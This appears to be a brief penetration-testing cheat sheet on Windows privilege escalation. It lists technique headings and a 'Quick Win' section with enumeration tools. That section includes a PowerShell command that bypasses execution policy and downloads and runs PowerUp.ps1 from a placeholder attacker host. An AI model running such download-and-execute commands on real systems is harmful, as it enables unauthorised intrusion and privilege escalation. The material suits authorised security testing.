Privilege escalation
Index
- Patches Detection
- Services and Processes
- Registry
- Scheduled Tasks
- Startup Applications
- Password mining
- Impersonation / tokens
- Admin2System
- Exploits
- Privilege abuse
Quick Win
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://<ip>/PowerUp.ps1'); Invoke-AllChecks | Out-File -Encoding ASCII checks.txt"
SharpUp.exe
Watson.exe
. .\HostEnum.ps1
Invoke-HostEnum -Local -Privesc -HTMLReport
Enumeration
https://cs.piosky.fr/enumeration/windows/